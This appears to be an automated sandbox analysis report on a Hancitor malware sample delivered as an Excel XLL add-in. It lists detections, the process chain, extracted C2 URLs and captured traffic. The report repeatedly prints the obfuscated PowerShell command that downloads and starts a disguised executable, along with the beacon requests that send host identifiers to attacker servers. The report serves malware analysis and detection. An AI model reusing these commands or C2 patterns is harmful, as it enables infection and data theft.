Windows Analysis Report 0708_5355150121.xll

Overview

General Information

Sample Name: 0708_5355150121.xll
Analysis ID: 445958
MD5: 41e0318dfdb1c180a375a7efc712649e
SHA1: f0c230010c7b85544c25879d4daf74479360e1bc
SHA256: 73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
Tags: dll, xll

Detection

Hancitor
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Hancitor
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files to the user root directory
May check the online IP address of the machine
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6120 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde MD5: 5D6638F2C8F8571C593999C58866007E)
    • mshta.exe (PID: 5756 cmdline: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
      • powershell.exe (PID: 5944 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 5788 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • snd32sys.exe (PID: 2160 cmdline: 'C:\Users\Public\snd32sys.exe' MD5: ED1921467F6784AF6BDCA40A06A541B5)
  • cleanup

Malware Configuration

Threatname: Hancitor

{"Campaign Id": "0707in2_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings listed beneath each entry)
00000001.00000003.225595145.0000000006590000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x18c6a:$s1: poWerSHEll
00000001.00000003.224640872.0000000002F76000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0xeee:$s1: poWerSHEll
  • 0x1256:$s1: PowerShell
  • 0x1256:$sr1: PowerShell
  • 0x1256:$sn3: PowerShell
00000001.00000002.227307568.0000000002F76000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0xeee:$s1: poWerSHEll
  • 0x1256:$s1: PowerShell
  • 0x1256:$sr1: PowerShell
  • 0x1256:$sn3: PowerShell
00000001.00000003.225197640.0000000002F76000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0xeee:$s1: poWerSHEll
  • 0x1256:$s1: PowerShell
  • 0x1256:$sr1: PowerShell
  • 0x1256:$sn3: PowerShell
00000002.00000002.348453730.0000000004B30000.00000004.00000040.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x1563:$s1: powershell
  • 0x1572:$s1: poWerSHEll
  • 0x1563:$sr1: powershell
  • 0x1563:$sn1: powershell

Unpacked PEs

Source | Rule | Description | Author (matched strings listed beneath each entry)
16.3.snd32sys.exe.12f4305.0.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security
16.3.snd32sys.exe.12f4305.0.unpack | Hancitor | Hancitor Payload | kevoreilly
  • 0x54f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
16.3.snd32sys.exe.12f4305.0.raw.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security
16.3.snd32sys.exe.12f4305.0.raw.unpack | Hancitor | Hancitor Payload | kevoreilly
  • 0x114f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
16.2.snd32sys.exe.610000.0.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security

Sigma Overview

System Summary:

Sigma detected: Execution from Suspicious Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\snd32sys.exe' , CommandLine: 'C:\Users\Public\snd32sys.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\snd32sys.exe, NewProcessName: C:\Users\Public\snd32sys.exe, OriginalFileName: C:\Users\Public\snd32sys.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5944, ProcessCommandLine: 'C:\Users\Public\snd32sys.exe' , ProcessId: 2160
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started, Author: Michael Haag, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5756, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ProcessId: 5944
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Data: Command: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6120, ProcessCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ProcessId: 5756
Sigma detected: Mshta Spawning Windows Shell
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5756, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ProcessId: 5944
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5756, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ProcessId: 5944

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, Malware Configuration Extractor: Hancitor {"Campaign Id": "0707in2_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}
Multi AV Scanner detection for submitted file
Source: 0708_5355150121.xll, Virustotal: Detection: 23%
Source: 0708_5355150121.xll, ReversingLabs: Detection: 17%
Source: 16.2.snd32sys.exe.610000.0.unpack, Avira: Label: TR/Dropper.Gen

Location Tracking:

Yara detected Hancitor
Source: Yara match, File source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: snd32sys.exe PID: 2160, type: MEMORY
Source: C:\Users\Public\snd32sys.exe, Code function: 16_2_00612CB0 CryptAcquireContextA, CryptCreateHash, CryptHashData, CryptDeriveKey, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptReleaseContext
Source: C:\Users\Public\snd32sys.exe, Code function: 16_2_00612CF7 CryptDestroyHash, CryptDestroyKey, CryptReleaseContext
Source: C:\Users\Public\snd32sys.exe, Code function: 16_2_00612D78 CryptDestroyHash, CryptDestroyKey, CryptReleaseContext
Source: C:\Users\Public\snd32sys.exe, Code function: 16_2_00612D58 CryptDestroyHash, CryptDestroyKey, CryptReleaseContext
Source: C:\Users\Public\snd32sys.exe, Code function: 16_2_00612D35 CryptDestroyHash, CryptDestroyKey, CryptReleaseContext

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\Public\snd32sys.exe, Unpacked PE file: 16.2.snd32sys.exe.610000.0.unpack
Source: 0708_5355150121.xll, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: Binary string: c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb source: snd32sys.exe, snd32sys.exe.6.dr
Source: C:\Users\Public\snd32sys.exe, Code function: 16_2_0065838E FindFirstFileExW, FindNextFileW, FindClose
Source: C:\Users\Public\snd32sys.exe, Code function: 16_2_00657FD2 FindFirstFileExW

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\mshta.exe

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: http://sudepallon.com/8/forum.php
Source: Malware configuration extractor, URLs: http://anspossthrly.ru/8/forum.php
Source: Malware configuration extractor, URLs: http://thentabecon.ru/8/forum.php
Downloads files with wrong headers with respect to MIME Content-Type
Source: http, Image file has PE prefix: HTTP/1.1 200 OK, Server: nginx, Date: Thu, 08 Jul 2021 14:30:58 GMT, Content-Type: image/jpeg, Content-Length: 763392, Connection: keep-alive, Last-Modified: Wed, 07 Jul 2021 13:36:32 GMT, ETag: "60e5ade0-ba600", Accept-Ranges: bytes
May check the online IP address of the machine
Source: C:\Users\Public\snd32sys.exe, DNS query: name: api.ipify.org
Source: global traffic, HTTP traffic detected: GET /92375234.xml HTTP/1.1, Connection: Keep-Alive, Host: srand04rf.ru
Source: Joe Sandbox View, IP Address: 23.21.173.155
Source: Joe Sandbox View, IP Address: 77.222.42.67
Source: Joe Sandbox View, ASN Name: SWEB-ASRU
Source: global traffic, HTTP traffic detected: GET /08.jpg HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1, Host: srand04rf.ru, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, Accept: */*, User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, Host: api.ipify.org, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST /8/forum.php HTTP/1.1, Accept: */*, Content-Type: application/x-www-form-urlencoded, User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, Host: sudepallon.com, Content-Length: 122, Cache-Control: no-cache, Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00611FC0 InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,
        Source: global traffic | HTTP traffic detected: GET /92375234.xml HTTP/1.1 | Connection: Keep-Alive | Host: srand04rf.ru
        Source: global traffic | HTTP traffic detected: GET /08.jpg HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: srand04rf.ru | Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: api.ipify.org | Cache-Control: no-cache
        Source: unknown | DNS traffic detected: queries for: srand04rf.ru
        Source: unknown | HTTP traffic detected: POST /8/forum.php HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: sudepallon.com | Content-Length: 122 | Cache-Control: no-cache | Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 | Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: snd32sys.exe | String found in binary or memory: http://api.ipify.org
        Source: snd32sys.exe, 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp | String found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
        Source: 0708_5355150121.xll | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
        Source: powershell.exe, 00000002.00000003.226352766.0000000007D51000.00000004.00000001.sdmp, 0708_5355150121.xll | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: 0708_5355150121.xll | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
        Source: 0708_5355150121.xll | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
        Source: 0708_5355150121.xll | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
